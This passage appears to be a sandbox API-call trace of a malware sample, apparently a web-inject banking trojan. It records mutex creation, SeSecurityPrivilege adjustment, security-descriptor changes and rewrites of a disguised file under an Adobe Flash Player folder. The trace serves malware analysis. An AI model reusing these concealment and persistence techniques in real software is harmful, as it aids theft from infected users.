arglist=0x725ecdc | out: pszDest="00") returned 2 [0127.565] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="00") returned 2 [0127.565] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="B7") returned 2 [0127.565] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="49") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="67") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="98") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="F6") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="14") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="59") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="35") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="AA") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="3E") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="27") returned 2 [0127.566] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="60") returned 2 [0127.566] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x2f0 [0127.566] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0xffffffff) returned 0x0 [0127.566] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0127.566] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0127.566] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0127.567] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0127.567] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0127.567] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0127.567] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0127.567] GetCurrentThread () returned 0xfffffffe [0127.567] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725ef64 | out: TokenHandle=0x725ef64*=0x0) returned 0 [0127.567] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725ef64 | out: TokenHandle=0x725ef64*=0x2ec) returned 1 [0127.567] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725ef6c | out: lpLuid=0x725ef6c*(LowPart=0x8, HighPart=0)) returned 1 [0127.568] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x725ef68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0127.568] GetLastError () returned 0x0 [0127.568] CloseHandle (hObject=0x2ec) returned 1 [0127.568] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0127.568] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5291850, lpbSaclPresent=0x725ef9c, pSacl=0x725ef90, lpbSaclDefaulted=0x725ef98 | out: lpbSaclPresent=0x725ef9c, pSacl=0x725ef90, lpbSaclDefaulted=0x725ef98) returned 1 [0127.568] SetNamedSecurityInfoW () returned 0x0 [0127.576] LocalFree (hMem=0x5291850) returned 0x0 [0127.576] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0127.576] GetCurrentThread () returned 0xfffffffe [0127.576] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725ef64 | out: TokenHandle=0x725ef64*=0x0) returned 0 [0127.576] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725ef64 | out: TokenHandle=0x725ef64*=0x2ec) returned 1 [0127.576] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725ef6c | out: lpLuid=0x725ef6c*(LowPart=0x8, HighPart=0)) returned 1 [0127.577] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x725ef68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0127.577] GetLastError () returned 0x0 [0127.577] CloseHandle (hObject=0x2ec) returned 1 [0127.578] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0127.578] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5291910, lpbSaclPresent=0x725ef9c, pSacl=0x725ef90, lpbSaclDefaulted=0x725ef98 | out: lpbSaclPresent=0x725ef9c, pSacl=0x725ef90, lpbSaclDefaulted=0x725ef98) returned 1 [0127.578] SetNamedSecurityInfoW () returned 0x0 [0127.579] LocalFree (hMem=0x5291910) returned 0x0 [0127.579] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0127.580] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x725efb0 | out: lpFileSize=0x725efb0*=4808) returned 1 [0127.580] VirtualAlloc (lpAddress=0x0, dwSize=0x12c8, flAllocationType=0x3000, flProtect=0x4) returned 0x7860000 [0127.580] ReadFile (in: hFile=0x2ec, lpBuffer=0x7860000, nNumberOfBytesToRead=0x12c8, lpNumberOfBytesRead=0x725efbc, lpOverlapped=0x0 | out: lpBuffer=0x7860000*, lpNumberOfBytesRead=0x725efbc*=0x12c8, lpOverlapped=0x0) returned 1 [0127.588] CloseHandle (hObject=0x2ec) returned 1 [0127.588] wvnsprintfA (in: pszDest=0x5414308, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366202") returned 10 [0127.589] wvnsprintfA (in: pszDest=0x54142c8, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366203") returned 10 [0127.589] wvnsprintfA (in: pszDest=0x5414268, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366203") returned 10 [0127.590] wvnsprintfA (in: pszDest=0x5414328, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366203") returned 10 [0127.591] wvnsprintfA (in: pszDest=0x5414288, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366203") returned 10 [0127.592] wvnsprintfA (in: pszDest=0x54143a8, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366203") returned 10 [0127.592] wvnsprintfA (in: pszDest=0x54143e8, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366203") returned 10 [0127.615] wvnsprintfA (in: pszDest=0x5414388, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366203") returned 10 [0127.616] wvnsprintfA (in: pszDest=0x5414408, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366204") returned 10 [0127.616] wvnsprintfA (in: pszDest=0x5414368, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366204") returned 10 [0127.617] wvnsprintfA (in: pszDest=0x5414288, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366204") returned 10 [0127.618] wvnsprintfA (in: pszDest=0x54143a8, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366204") returned 10 [0127.619] wvnsprintfA (in: pszDest=0x54143e8, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366204") returned 10 [0127.619] wvnsprintfA (in: pszDest=0x5414268, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366204") returned 10 [0127.620] wvnsprintfA (in: pszDest=0x5414408, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366204") returned 10 [0127.621] wvnsprintfA (in: pszDest=0x5414348, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366205") returned 10 [0127.621] wvnsprintfA (in: pszDest=0x54143a8, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366205") returned 10 [0127.622] wvnsprintfA (in: pszDest=0x54142a8, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366205") returned 10 [0127.623] wvnsprintfA (in: pszDest=0x54142e8, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366209") returned 10 [0127.624] wvnsprintfA (in: pszDest=0x5414428, cchDest=21, pszFmt="%d", arglist=0x725ef00 | out: pszDest="1476366209") returned 10 [0127.625] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0127.629] WriteFile (in: hFile=0x2ec, lpBuffer=0x5404d18*, nNumberOfBytesToWrite=0x13ca, lpNumberOfBytesWritten=0x725efb4, lpOverlapped=0x0 | out: lpBuffer=0x5404d18*, lpNumberOfBytesWritten=0x725efb4, lpOverlapped=0x0) returned 1 [0127.629] CloseHandle (hObject=0x2ec) returned 1 [0127.643] ReleaseMutex (hMutex=0x2f0) returned 1 [0127.643] CloseHandle (hObject=0x2f0) returned 1 [0127.643] SetLastError (dwErrCode=0x0) [0127.643] GetLastError () returned 0x0 [0127.643] GetLocalTime (in: lpSystemTime=0x725f398 | out: lpSystemTime=0x725f398*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x1e, wMilliseconds=0x40)) [0127.643] GetCurrentThreadId () returned 0xd6c [0127.643] GetCurrentProcessId () returned 0x2ec [0127.643] wvnsprintfW (in: pszDest=0x54010a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x725f33c | out: pszDest="[13.10.2016 15:43:30] ver=2.2.5, log=0x001F, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: ") returned 86 [0127.643] wvnsprintfW (in: pszDest=0x540114c, cchDest=1962, pszFmt="downloadWebinjects: No url.", arglist=0x725f3bc | out: pszDest="downloadWebinjects: No url.") returned 27 [0127.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:30] ver=2.2.5, log=0x001F, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: downloadWebinjects: No url.", cchWideChar=113, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 113 [0127.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:30] ver=2.2.5, log=0x001F, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: downloadWebinjects: No url.", cchWideChar=113, lpMultiByteStr=0x54164e0, cbMultiByte=114, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:30] ver=2.2.5, log=0x001F, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: downloadWebinjects: No url.", lpUsedDefaultChar=0x0) returned 113 [0127.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:30] ver=2.2.5, log=0x001F, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: downloadWebinjects: No url.", cchWideChar=113, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 113 [0127.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:30] ver=2.2.5, log=0x001F, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: downloadWebinjects: No url.", cchWideChar=113, lpMultiByteStr=0x5416210, cbMultiByte=114, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:30] ver=2.2.5, log=0x001F, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: downloadWebinjects: No url.", lpUsedDefaultChar=0x0) returned 113 [0127.644] GetSystemTime (in: lpSystemTime=0x725ef88 | out: lpSystemTime=0x725ef88*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x1e, wMilliseconds=0x40)) [0127.644] SystemTimeToFileTime (in: lpSystemTime=0x725ef88, lpFileTime=0x725ef78 | out: lpFileTime=0x725ef78) returned 1 [0127.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0127.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x54120c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0127.644] GetUserNameExW () returned 0x1 [0127.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0127.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x54130c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="8A") returned 2 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="00") returned 2 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="00") returned 2 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="00") returned 2 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="B7") returned 2 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="49") returned 2 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="67") returned 2 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="98") returned 2 [0127.645] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="F6") returned 2 [0127.646] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="14") returned 2 [0127.646] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="59") returned 2 [0127.646] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="35") returned 2 [0127.646] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="AA") returned 2 [0127.646] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="3E") returned 2 [0127.646] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="27") returned 2 [0127.646] wvnsprintfW (in: pszDest=0x725ed70, cchDest=6, pszFmt="%02X", arglist=0x725ed4c | out: pszDest="60") returned 2 [0127.646] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x2f0 [0127.646] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0xffffffff) returned 0x0 [0127.646] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0127.646] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0127.646] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0127.646] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0127.647] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0127.647] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0127.647] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0127.647] GetCurrentThread () returned 0xfffffffe [0127.647] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725efd4 | out: TokenHandle=0x725efd4*=0x0) returned 0 [0127.647] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725efd4 | out: TokenHandle=0x725efd4*=0x2ec) returned 1 [0127.647] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725efdc | out: lpLuid=0x725efdc*(LowPart=0x8, HighPart=0)) returned 1 [0127.648] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x725efd8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0127.648] GetLastError () returned 0x0 [0127.648] CloseHandle (hObject=0x2ec) returned 1 [0127.648] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0127.648] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5291820, lpbSaclPresent=0x725f00c, pSacl=0x725f000, lpbSaclDefaulted=0x725f008 | out: lpbSaclPresent=0x725f00c, pSacl=0x725f000, lpbSaclDefaulted=0x725f008) returned 1 [0127.648] SetNamedSecurityInfoW () returned 0x0 [0127.657] LocalFree (hMem=0x5291820) returned 0x0 [0127.657] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0127.657] GetCurrentThread () returned 0xfffffffe [0127.657] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725efd4 | out: TokenHandle=0x725efd4*=0x0) returned 0 [0127.657] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725efd4 | out: TokenHandle=0x725efd4*=0x2ec) returned 1 [0127.657] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725efdc | out: lpLuid=0x725efdc*(LowPart=0x8, HighPart=0)) returned 1 [0127.658] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x725efd8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0127.658] GetLastError () returned 0x0 [0127.658] CloseHandle (hObject=0x2ec) returned 1 [0127.658] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0127.658] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52917f0, lpbSaclPresent=0x725f00c, pSacl=0x725f000, lpbSaclDefaulted=0x725f008 | out: lpbSaclPresent=0x725f00c, pSacl=0x725f000, lpbSaclDefaulted=0x725f008) returned 1 [0127.658] SetNamedSecurityInfoW () returned 0x0 [0127.660] LocalFree (hMem=0x52917f0) returned 0x0 [0127.660] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0127.660] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x725f020 | out: lpFileSize=0x725f020*=5066) returned 1 [0127.660] VirtualAlloc (lpAddress=0x0, dwSize=0x13ca, flAllocationType=0x3000, flProtect=0x4) returned 0x7860000 [0127.660] ReadFile (in: hFile=0x2ec, lpBuffer=0x7860000, nNumberOfBytesToRead=0x13ca, lpNumberOfBytesRead=0x725f02c, lpOverlapped=0x0 | out: lpBuffer=0x7860000*, lpNumberOfBytesRead=0x725f02c*=0x13ca, lpOverlapped=0x0) returned 1 [0127.669] CloseHandle (hObject=0x2ec) returned 1 [0127.670] wvnsprintfA (in: pszDest=0x5459308, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366202") returned 10 [0127.688] wvnsprintfA (in: pszDest=0x54592a8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366203") returned 10 [0127.688] wvnsprintfA (in: pszDest=0x54592a8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366203") returned 10 [0127.689] wvnsprintfA (in: pszDest=0x54592a8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366203") returned 10 [0127.690] wvnsprintfA (in: pszDest=0x54593c8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366203") returned 10 [0127.690] wvnsprintfA (in: pszDest=0x5459428, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366203") returned 10 [0127.691] wvnsprintfA (in: pszDest=0x5459348, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366203") returned 10 [0127.692] wvnsprintfA (in: pszDest=0x5459348, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366203") returned 10 [0127.693] wvnsprintfA (in: pszDest=0x54592a8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366204") returned 10 [0127.693] wvnsprintfA (in: pszDest=0x5459348, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366204") returned 10 [0127.694] wvnsprintfA (in: pszDest=0x5459388, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366204") returned 10 [0127.695] wvnsprintfA (in: pszDest=0x5459308, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366204") returned 10 [0127.695] wvnsprintfA (in: pszDest=0x54592a8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366204") returned 10 [0127.696] wvnsprintfA (in: pszDest=0x5459428, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366204") returned 10 [0127.697] wvnsprintfA (in: pszDest=0x5459308, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366204") returned 10 [0127.698] wvnsprintfA (in: pszDest=0x5459308, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366205") returned 10 [0127.698] wvnsprintfA (in: pszDest=0x5459388, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366205") returned 10 [0127.699] wvnsprintfA (in: pszDest=0x54592a8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366205") returned 10 [0127.700] wvnsprintfA (in: pszDest=0x54593e8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366209") returned 10 [0127.700] wvnsprintfA (in: pszDest=0x54592a8, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366209") returned 10 [0127.701] wvnsprintfA (in: pszDest=0x5459428, cchDest=21, pszFmt="%d", arglist=0x725ef70 | out: pszDest="1476366210") returned 10 [0127.702] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0127.706] WriteFile (in: hFile=0x2ec, lpBuffer=0x5404db8*, nNumberOfBytesToWrite=0x14b7, lpNumberOfBytesWritten=0x725f024, lpOverlapped=0x0 | out: lpBuffer=0x5404db8*, lpNumberOfBytesWritten=0x725f024, lpOverlapped=0x0) returned 1 [0127.707] CloseHandle (hObject=0x2ec) returned 1 [0127.724] ReleaseMutex (hMutex=0x2f0) returned 1 [0127.724] CloseHandle (hObject=0x2f0) returned 1 [0127.724] SetLastError (dwErrCode=0x0) [0127.724] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x493e0) Thread: id = 22 os_tid = 0xd70 [0120.202] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="7D") returned 2 [0120.202] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="00") returned 2 [0120.202] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="00") returned 2 [0120.202] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="00") returned 2 [0120.202] wvnsprintfW (in: pszDest=0x735f408, cchDest=6, pszFmt="%02X", arglist=0x735f3e4 | out: pszDest="8A") returned 2 [0120.202] wvnsprintfW (in: pszDest=0x735f408, 